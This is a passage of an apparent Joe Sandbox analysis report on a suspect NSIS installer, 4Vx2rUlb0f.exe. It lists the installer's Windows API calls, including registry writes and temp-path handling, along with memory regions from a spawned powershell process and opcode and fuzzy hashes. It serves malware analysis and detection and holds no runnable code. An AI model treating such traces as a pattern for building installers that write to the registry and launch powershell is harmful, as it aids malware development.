                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 2659869361-3081826266
                                                                                                                                • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                                                                • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                • lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1356686001-0
                                                                                                                                • Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                                                                • Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402D9D
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402DE6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                                                                • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Windowlet Setup,NSIS Error), ref: 0040605D
                                                                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                                                                • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 3248276644-3081826266
                                                                                                                                • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                                                                • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405152
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                                                                  • Part of subcall function 00404160: SendMessageW.USER32(00010488,00000000,00000000,00000000), ref: 00404172
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                                                                • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 1100898210-3081826266
                                                                                                                                • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                                                                • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4Vx2rUlb0f.exe,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405A56
                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4Vx2rUlb0f.exe,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405A66
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 2709904686-224404859
                                                                                                                                • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                                                                • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                                                                • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2691060002.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_47f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a48ccbe6b37b924edfab29354b527193f2e085edb84c71379575ae222812f214
                                                                                                                                • Instruction ID: 4db19a19eebc6e4321d4e9165d9038cde41c9e6df99da6a7fce077f2ebc83c08
                                                                                                                                • Opcode Fuzzy Hash: a48ccbe6b37b924edfab29354b527193f2e085edb84c71379575ae222812f214
                                                                                                                                • Instruction Fuzzy Hash: 7ED13A34A052489FCB15CFA8D984A9DFBF2EF89310F258199E808AB365D735ED45CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2691060002.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_47f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a27c7ba6f5ecbb4b6bdbb97ac3e361f3f162d7cb77bc86c3b06093bd9302f30
                                                                                                                                • Instruction ID: 5c52ac121f86b020fc51535a65872d71a86d66af8e1221ba513766aa754ae964
                                                                                                                                • Opcode Fuzzy Hash: 8a27c7ba6f5ecbb4b6bdbb97ac3e361f3f162d7cb77bc86c3b06093bd9302f30
                                                                                                                                • Instruction Fuzzy Hash: 54A19F35A00209DFDB18DFA5C984AADBBB6FF84310F118558E506AF364DB74BD89CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2691060002.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_47f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c418e729556f7f86bd03b45ff017f5d58e488b25abfc68205dcdb26c800c5426
                                                                                                                                • Instruction ID: 26910092e3602ed39e17510845553163f69c6a50739850f81927852b2a78ba00
                                                                                                                                • Opcode Fuzzy Hash: c418e729556f7f86bd03b45ff017f5d58e488b25abfc68205dcdb26c800c5426
                                                                                                                                • Instruction Fuzzy Hash: CC617D30A00209CFCB18DF69C880AAEFBB2FF85314F14856AE4059B765DB71AD46CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2691060002.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_47f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 77326d11e516e482d117b33b6a36d27cefc750acad993a7f09cee801173404bd
                                                                                                                                • Instruction ID: 2607ad3da232fbd46afb307d64a3491d00ce7acde261b1f7abc5a6ed88511d5d
                                                                                                                                • Opcode Fuzzy Hash: 77326d11e516e482d117b33b6a36d27cefc750acad993a7f09cee801173404bd
                                                                                                                                • Instruction Fuzzy Hash: 7A415130A402089FDB18DF79C9957AEBBE7AF88310F18C469D806AB355DE75DC458B60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2691060002.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_47f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c9198b7b57afb64c5bffbf5269a2ed3c32661e34287c8fa0101c5fb551faf7d
                                                                                                                                • Instruction ID: d04428412775eb5a67c121dddfd7cf0921f4f68cc37ad94bf8be8747b1d04783
                                                                                                                                • Opcode Fuzzy Hash: 6c9198b7b57afb64c5bffbf5269a2ed3c32661e34287c8fa0101c5fb551faf7d
                                                                                                                                • Instruction Fuzzy Hash: 5F418E34B40204CFDB28DF65C954AADBBF2EF88350F454468E506EB7A0CB75AD41CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2685138566.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2ebd000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 388eb03c14e93337e23360fcd60e3e33511a58bfb12234eec98a122a8a1bfdde
                                                                                                                                • Instruction ID: ccd1c9e00a31f6d08233c15b36245d678fb947e5fb50f39a8d53520b75ce7b74
                                                                                                                                • Opcode Fuzzy Hash: 388eb03c14e93337e23360fcd60e3e33511a58bfb12234eec98a122a8a1bfdde
                                                                                                                                • Instruction Fuzzy Hash: BB210075540200DFCF16DF24DAC0B67BFA1FF88318F20C5A9E90A4A656C336D856CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2685138566.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2ebd000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 64721ed38aacaa180ee53ffe23b0f6b1837b4d913eb10aa72500e0a7bf7a1877
                                                                                                                                • Instruction ID: 540cb06af7c63e42d2c72f9c9a8df0176ecf132dbe843c5609e5ef87918d1170
                                                                                                                                • Opcode Fuzzy Hash: 64721ed38aacaa180ee53ffe23b0f6b1837b4d913eb10aa72500e0a7bf7a1877
                                                                                                                                • Instruction Fuzzy Hash: D32146B1580240CFD706DF34CA80B67BBA4EF94318F20C66DED094B669C73AC446C6A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2685138566.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2ebd000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                • Instruction ID: 7816ddab8ce08a7a5d8222644a5e64ad7bd54296dc34e1b24f253c701795f688
                                                                                                                                • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                • Instruction Fuzzy Hash: 8721AC76544240DFCF16CF10D9C4B56BF62FF48318F24C6A9E9094A666C33AD86ACB91
                                                                                                                                Memory Dump Source
